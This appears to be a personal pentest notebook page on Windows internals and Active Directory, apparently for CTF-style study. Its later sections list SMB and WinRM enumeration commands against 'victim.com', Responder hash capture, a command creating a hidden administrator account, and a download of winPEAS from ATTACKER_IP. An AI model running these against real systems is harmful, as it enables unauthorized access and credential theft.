Notes windows

Alternate Data Streams (ADS)

Alternate Data Streams (ADS) is a file attribute specific to Windows NTFS (New Technology File System).

Every file has at least one data stream ($DATA), and ADS allows files to contain more than one stream of data. Natively Window Explorer doesn't display ADS to the user. There are 3rd party executables that can be used to view this data, but Powershell gives you the ability to view ADS for files.

From a security perspective, malware writers have used ADS to hide data.

Not all its uses are malicious. For example, when you download a file from the Internet, there are identifiers written to ADS to identify that the file was downloaded from the Internet.

To learn more about ADS, refer to the following link from MalwareBytes here.

Bonus: If you wish to interact hands-on with ADS, I suggest exploring Day 21 of Advent of Cyber 2.

Stuff

Local User and Group Management. Right-click on the Start Menu and click Run. Type lusrmgr.msc

Windows Task Manager: The Complete GuideHow-To Geek

The System Configuration utility (MSConfig)

The Computer Management (compmgmt.msc)

the System Information (msinfo32) tool

Resource Monitor (resmon)

Registry Editor (regedit).

Tip: Another way to access Windows Update is from the Run dialog box, or CMD, by running the command control /name Microsoft.WindowsUpdate.

https://msrc.microsoft.com/update-guide (cve and stuff)

BitLocker Drive Encryption is a data protection feature that integrates with the operating system and addresses the threats of data theft or exposure from lost, stolen, or inappropriately decommissioned computers

BitLocker provides the most protection when used with a Trusted Platform Module (TPM) version 1.2 or later. The TPM is a hardware component installed in many newer computers by the computer manufacturers. It works with BitLocker to help protect user data and to ensure that a computer has not been tampered with while the system was offline

Volume Shadow Copy Service (VSS) coordinates the required actions to create a consistent shadow copy (also known as a snapshot or a point-in-time copy) of the data that is to be backed up.

https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portaldocs.microsoft.com

Learn about Windows Hello and set it up

Attackers use built-in Windows tools and utilities in an attempt to go undetected within the victim environment. This tactic is known as Living Off The Land. Refer to the following resource here to learn more about this.

Active Directory

The server that runs the Active Directory services is known as a Domain Controller (DC).

Active Directory Domain Service (AD DS). This service acts as a catalogue that holds the information of all of the "objects" that exist on your network. - users, groups, machines, printers, shares and many others.

Users

Users are one of the objects known as security principals, meaning that they can be authenticated by the domain and can be assigned privileges over resources like files or printers. You could say that a security principal is an object that can act upon resources in the network.

Users can be used to represent two types of entities:

People
Services : you can also define users to be used by services like IIS or MSSQL. Every single service requires a user to run, but service users are different from regular users as they will only have the privileges needed to run their specific service.

Machines

Machines are another type of object within Active Directory; for every computer that joins the Active Directory domain, a machine object will be created. Machines are also considered "security principals" and are assigned an account just as any regular user. This account has somewhat limited rights within the domain itself.

The machine accounts themselves are local administrators on the assigned computer, they are generally not supposed to be accessed by anyone except the computer itself, but as with any other account, if you have the password, you can use it to log in.

Note: Machine Account passwords are automatically rotated out and are generally comprised of 120 random characters.

Identifying machine accounts is relatively easy. They follow a specific naming scheme. The machine account name is the computer's name followed by a dollar sign. For example, a machine named DC01 will have a machine account called DC01$.

Security Groups

Security groups are also considered security principals and, therefore, can have privileges over resources on the network.

Groups can have both users and machines as members. If needed, groups can include other groups as well.

Several groups are created by default in a domain that can be used to grant specific privileges to users. As an example, here are some of the most important groups in a domain:

Security Group

Description

Domain Admins

Users of this group have administrative privileges over the entire domain. By default, they can administer any computer on the domain, including the DCs.

Server Operators

Users in this group can administer Domain Controllers. They cannot change any administrative group memberships.

Backup Operators

Users in this group are allowed to access any file, ignoring their permissions. They are used to perform backups of data on computers.

Account Operators

Users in this group can create or modify other accounts in the domain.

Domain Users

Includes all existing user accounts in the domain.

Domain Computers

Includes all existing computers in the domain.

Domain Controllers

Includes all existing DCs on the domain.

You can obtain the complete list of default security groups from the Microsoft documentation.

Powershell commands

Set-ADAccountPassword sophie -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
Set-ADUser -ChangePasswordAtLogon $true -Identity sophie -Verbose

Enumeration

Samba

# Enumerate shares
crackmapexec smb victim.com -u USERNAME -p 'password#1234' --shares
# Get password policy
crackmapexec smb victim.com -u USERNAME -p 'password#1234' --pass-pol

smbmap -u 'USERNAME' -p 'password#1234'  -H victim.com  -r

smbclient -U USERNAME  //victim.com/Shared

crackmapexec winrm victim.com  -u USERNAME -p 'password'
evil-winrm -i windcorp.thm -u USERNAME -p 'password'

Networking

Responder

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

sudo responder -I tun0

--> Get NTLMv2 Hash to crack it afterwards

Post Exploitation

system

# all groups the user is part of and special privilege
whoami /all
# Reset password
net user USERNAME PASSWORD
# Create admin user
net user USERNAME PASSWORD /add;net localgroup Administrators USERNAME /add
# List of AD members
Get-ADGroupMember -Identity 'Account Operators' -Recursive | select name

privilege escalation

invoke-webrequest -Uri 'http://ATTACKER_IP:8000/winPEAS.bat' -OutFile winpeas.bat

psexec

SANS Penetration Testing | Psexec Python Rocks! | SANS Institute

PreviousWindows NextVarious tips

Last updated 2 years ago